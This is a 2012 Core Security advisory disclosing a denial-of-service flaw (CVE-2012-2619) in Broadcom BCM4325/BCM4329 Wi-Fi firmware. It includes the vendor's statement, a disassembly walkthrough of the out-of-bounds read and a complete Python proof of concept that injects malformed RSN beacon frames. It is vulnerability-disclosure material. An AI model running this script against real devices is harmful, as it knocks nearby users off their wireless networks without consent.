**Title:**Broadcom DoS on BCM4325 and BCM4329 devices
**Advisory ID:**CORE-2012-0718
Advisory URL:http://www.coresecurity.com/content/broadcom-input-validation-BCM4325-BCM4329
**Date published:**2012-10-23
**Date of last update:**2012-10-23
**Vendors contacted:**Broadcom Corporation
**Release mode:**User release
**Class:**Input validation error [CWE-20]
**Impact:**Denial of service
**Remotely Exploitable:**Yes
**Locally Exploitable:**No
CVE Name:CVE-2012-2619
An out-of-bounds read error condition exists in Broadcom’s BCM4325 and BCM4329 combo solutions firmware. This error can be leveraged to denial of service attack, and possibly information disclosure. An attacker can send a RSN (802.11i) information element, which causes the Wi-Fi NIC to stop responding.
Products containing BCM4325 and BCM4329 chipsets:
Vendor notifies that the following products are not subject to the DoS issue:
Broadcom’s official response:
“CORE Security Technologies has identified a potential Denial-of-Service (DoS) vulnerability in certain older Broadcom Wi-Fi chips, specifically the BCM4325 and BCM4329. Other Broadcom chips are not affected. This DoS issue identified by CORE Security Technologies, which would require significant technical expertise to mount, could cause certain consumer electronics devices containing these chips to experience a transient WLAN service interruption as long as the DoS is active. During the service interruption, other phone/tablet features would be unaffected. The DoS issue does not in any way compromise the security of users’ data. Broadcom has a patch available that addresses the issue and makes devices that include the BCM4325 and BCM4329 immune to a potential attack. Customers are accepting the patch on a case by case basis, recognizing that most affected devices are out of service. Broadcom has issued a patch that can make devices using the BCM4325 and BCM4329 chips immune to the issue as well. Broadcom has been working with our customers providing information and fixes as required and will continue doing so in response to address security and performance issues that may be identified.”
This vulnerability was discovered by Andres Blanco. The Proof of Concept and additional research was made by Andres Blanco and Matias Eissler from Core Impact team. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team.
Core Advisories Team would also like to thank CERT Coordination Center [1] for their assistance during the vulnerability reporting process.
00008E72 08 EB 8A 03 ADD.W R3, R8, R10,LSL#2 ;
auth_suite_count_ptr + auth_suite_count * 4
00008E76 9B 78 LDRB R3, [R3,#2] ;
out-of-bounds read.
At 0x00008E72
the register R8
contains the address of the RSN information element, where “authentication suite count” begins. Register R10
contains the 2-byte unsigned value of the “authentication suite count” field, which can be controlled by an attacker. This value is multiplied by 4 (shifted left 2 bits) because the size of authentication suite components is 4 bytes (3 bytes OUI and 1 byte authentication suite) and is added to the authentication suite pointer. Finally, a LoadByte
instruction attempts to load a byte from the resulting address +2 bytes (the size of the authentication suite counter) with insufficient validation, resulting in an out-of-bounds read error.
This PoC was implemented using the open source library Lorcon [2] and PyLorcon2 [3][4], a Python wrapper for the Lorcon library.
------------------------- poc.py -------------------------
#!/usr/bin/env python
import sys
import time
import struct
import PyLorcon2
def beaconFrameGenerator():
sequence = 0
while(1):
sequence = sequence % 4096
# Frame Control
frame = '\x80' # Version: 0 - Type: Managment - Subtype: Beacon
frame += '\x00' # Flags: 0
frame += '\x00\x00' # Duration: 0
frame += '\xff\xff\xff\xff\xff\xff' # Destination: ff:ff:ff:ff:ff:ff
frame += '\x00\x00\x00\x15\xde\xad' # Source: 00:00:00:15:de:ad
frame += '\x00\x00\x00\x15\xde\xad' # BSSID: 00:00:00:15:de:ad
frame += struct.pack('H', sequence) # Fragment: 0 - Sequenence:
part of the generator
# Frame Body
frame += struct.pack('Q', time.time()) # Timestamp
frame += '\x64\x00' # Beacon Interval: 0.102400 seconds
frame += '\x11\x04' # Capability Information: ESS, Privacy,
Short Slot time
# Information Elements
# SSID: buggy
frame += '\x00\x05buggy'
# Supported Rates: 1,2,5.5,11,18,24,36,54
frame += '\x01\x08\x82\x84\x8b\x96\x24\x30\x48\x6c'
# DS Parameter Set: 6
frame += '\x03\x01\x06'
# RSN IE
frame += '\x30' # ID: 48
frame += '\x14' # Size: 20
frame += '\x01\x00' # Version: 1
frame += '\x00\x0f\xac\x04' # Group cipher suite: TKIP
frame += '\x01\x00' # Pairwise cipher suite count: 1
frame += '\x00\x0f\xac\x00' # Pairwise cipher suite 1: TKIP
frame += '\xff\xff' # Authentication suites count: 65535
frame += '\x00\x0f\xac\x02' # Pairwise authentication suite 2: PSK
frame += '\x00\x00'
sequence += 1
yield frame
if __name__ == "__main__":
if len(sys.argv) != 2:
print "Usage:"
print "\t%s <wireless interface>" % sys.argv[0]
sys.exit(-1)
iface = sys.argv[1]
context = PyLorcon2.Context(iface)
context.open_injmon()
generator = beaconFrameGenerator()
for i in range(10000):
frame = generator.next()
time.sleep(0.100)
context.send_bytes(frame)
[1] <http://www.cert.org/>
[2] Lorcon official web site. <https://code.google.com/p/lorcon>
[3] PyLorcon2 wrapper. <http://code.google.com/p/pylorcon2>
[4] PyLorcon2 building and installing. <http://code.google.com/p/pylorcon2/wiki/BuildingPyLorcon2>
CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: <http://corelabs.coresecurity.com>.
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security’s software solutions build on over a decade of trusted research and leading-edge threat expertise from the company’s Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: <http://www.coresecurity.com>.
The contents of this advisory are copyright © 2012 Core Security Technologies and © 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: <http://creativecommons.org/licenses/by-nc-sa/3.0/us/>
This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at /legacy/files/attachments/core_security_advisories.asc.